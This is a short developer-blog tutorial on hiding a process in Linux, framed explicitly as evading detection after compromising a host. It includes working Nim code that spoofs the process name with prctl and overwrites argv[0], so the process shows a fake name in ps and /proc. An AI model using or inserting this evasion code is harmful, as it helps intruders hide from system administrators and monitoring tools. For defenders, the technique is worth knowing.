DEV Community

Cover image for Process hiding in Linux
fx2301
fx2301

Posted on

1

Process hiding in Linux

Why?

You want to evade detection post compromise of a host, and hide your process as something innocuous when someone inspects /proc or ps.

When?

You're host is Linux, and your executable is in C, or a language with FFI support.

How?

There are two classes of data to spoof:

  1. The contents of /proc/pid/cmdline. This is what shows up with ps -f.
  2. The contents of /proc/pid/comm and the first line of /proc/pid/status. This is what shows up with ps without -f.

In nim

import os

proc NimMain() {.cdecl, importc.}

proc syscall(number: clong): clong
    {.importc, varargs, header: "sys/syscall.h".}
var NR_PRCTL
    {.importc: "__NR_prctl", header: "unistd.h".}: int
var PR_SET_NAME
    {.importc: "PR_SET_NAME", header: "sys/prctl.h".}: int

proc main(argc: int, argv: cstringArray, envp: cstringArray): int
        {.cdecl, exportc.} =
    NimMain()

    const FAKE_COMMAND = "spoofed"

    # handles /proc/pid/comm and /proc/pid/status
    discard syscall(NR_PRCTL, PR_SET_NAME, cstring(FAKE_COMMAND))

    # handles /proc/pid/cmdline
    let totalLength = len(argv[0])
    var i = 0
    for ch in FAKE_COMMAND:
        argv[0][i] = FAKE_COMMAND[i]
        i += 1
    argv[0][i] = '\x00'
    for j in i .. totalLength:
        argv[0][j] = '\x00'

    sleep(60000)
Enter fullscreen mode Exit fullscreen mode
  • Note that you'll need to compile this with --nomain.
  • Note that as argc and envp is consecutive in memory this means that a longer FAKE_COMMAND than the actual argv[0] means we overwrite the contents of /proc/pid/environ. To work around this, ensure your executable has a longer name than the what you want to spoof as.

Image of Datadog

How to Diagram Your Cloud Architecture

Cloud architecture diagrams provide critical visibility into the resources in your environment and how theyโ€™re connected. In our latest eBook, AWS Solution Architects Jason Mimick and James Wenzel walk through best practices on how to build effective and professional diagrams.

Download the Free eBook

Top comments (0)

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more